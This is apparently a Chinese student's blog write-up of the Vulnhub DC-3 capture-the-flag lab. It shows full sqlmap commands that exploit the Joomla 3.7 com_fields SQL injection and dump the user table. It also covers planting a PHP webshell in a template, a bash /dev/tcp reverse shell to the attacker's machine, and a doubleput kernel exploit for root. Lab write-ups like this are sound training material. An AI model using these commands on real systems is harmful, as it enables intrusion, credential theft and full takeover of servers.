渗透测试Vulnhub-DC3

Preface

本篇为vulnhub系列DC3啦，距DC2这段时间发生了许许多多的事情，有好有坏，都过来了，这几天多了一个特别的人，是幸运吧哈哈哈。哈哈哈哈哈……开始前说点废话，练习过程中也是参考了许多大师傅们写的文章才完成了，在此记录一下，也非常希望师傅们能指正错误。

Process

老方法，先用nmap扫描一下，对师父们来说都是小意思，就不在挂图赘述啦，得到靶机IP以及只开放了80端口，那么直接访问web服务

在这里插入图片描述

可以看到直接就是登录页面，我是先用dirsearch扫描了一遍目录，扫描出来了后台登录页面以及其他目录，后面会用到，现在先不说，然后用cms指纹识别插件看一下网站信息

在这里插入图片描述

网站cms事Joomla，操作系统是Ubuntu，但是具体的版本号我们没有，这里有两个方法

1. 在dirsearch扫描出来的目录中有README.txt文件，直接访问可以在里面查看到版本号

在这里插入图片描述

1. 看其他师傅的文章的时候发现很多师傅用了joomscan这个工具，kali自带，直接扫描网站也可以得到版本以及其他目录信息，两个方法师傅们可以自己参考决定哈

漏洞利用

查到版本号后我直接百度了对应的漏洞利用文章，找到了sql注入，可以直接使用sqlmap跑，当然参考文章后发现大部分师傅是用searchsploit找的joomla3.7的漏洞，不过最后都是使用sqlmap注入，emmmm渗透过程就是这样，需要用不同的方法达到目的，不管是百度出来的文章还是searchsploit提供的都有payload

sqlmap -u “http://192.168.16.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" –risk=3 –level=5 –random-agent –dbs -p list[fullordering]

下面直接开始跑

在这里插入图片描述

可以看到跑出来数据库了，那么就往下继续跑，由于贴太多图没必要，就直接放最后的结果啦

payload：sqlmap -u “http://192.168.16.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" –risk=3 –level=5 –random-agent –dump -D joomladb -T ‘#__users’ -p list[fullordering]

在这里插入图片描述

可以看到用户名密码已经出来了，但是密码是经过加密的，可以直接用john直接破解出来，john使用方法这里就不再说了哈，百度很多文章，下面直接在扫描出来的后台登录页面登录

在这里插入图片描述

登录进去后就寻找利用点，本来以为会有文件上传的洞，后来看其他师傅的文章发现可以在模板目录下面写入php文件，那么直接写入一个php一句话进行连接

在这里插入图片描述

不过需要注意路径，因为是在beez3的模板中写入的，所以文件路径就是/templates/beez3/html/shell.php，当然师傅们也可以写在其他路径中，能getshell就可以哈，然后使用蚁剑连接

在这里插入图片描述

但是现在只是www-data权限，无法访问root目录，需要进一步提权，为了操作方便我们先反弹一个shell（其实这一步可以省略，既然涉及到了还是讲一下吧），本来是看到靶机有nc的，然后就一直试着用nc连接，但是一直报错连不上，后来看师傅们的文章发现是因为sh解析问题，于是用了其他师傅的反弹方法

kali先开启监听端口：nc -lvp 8888 然后在蚁剑中反向回连：bash -c ‘bash -i >& /dev/tcp/192.168.16.128/8888 0>&1’

这里简单解析一下bash反弹shell的命令，如果师傅们想了解原理的可以参考这两篇文章：Linux之bash反弹shell原理浅析、Linux各种一句话反弹shell总结

bash -c：使用bash执行-c选项后面跟的命令 bash -i：产生一个交互式bash /dev/tcp/192.168.16.128/8888：与192.168.16.128：8888端口产生一个tcp连接 >&、0>&1：将正确输出以及错误输出回显到攻击机

在这里插入图片描述

反弹成功，接下来就是进行提权了

提权

看了几个目录后发现没有什么信息，这就开始提权之旅，不过也是看了大师傅们的文章才知道的，可以先看下靶机的版本信息

在这里插入图片描述

可以看到是Ubuntu16.0.4版本的，那么就去searchsploit看下有没有对应的利用脚本（searchsploit我在前面的渗透测试Vulnhub-DC1中有写到）

在这里插入图片描述

对应的提权payload有很多，我也是偷懒看的师傅们试出来的脚本，然后直接查看利用方式

在这里插入图片描述

后面直接有exp的链接，是在github上面，直接在靶机中wget下载是不行的（也可能是我的网络问题），需要先下到本地，其实我本地也访问不了，开了VPN下载的，然后直接让exp放到靶机中，这里有两个方法

1. 直接复制到蚁剑中，比较简单
2. 先让exp放到kali的web目录下，然后开启web服务，然后在靶机中wget从kali上面下载，然后解压以后直接利用就可以啦，解压步骤这里就赘述了，直接解压exploit包就行。然后直接利用

在这里插入图片描述

能看到，先执行compile.sh文件，然后再执行doubleput就可以了，成功提权，最后查看flag

在这里插入图片描述

结束啦

Ending

暑假开始，我这个网安菜鸟也会好好利用这个暑假提升自己，也非常希望各位师傅能多多指教，就这么结尾吧，日后请多多关照！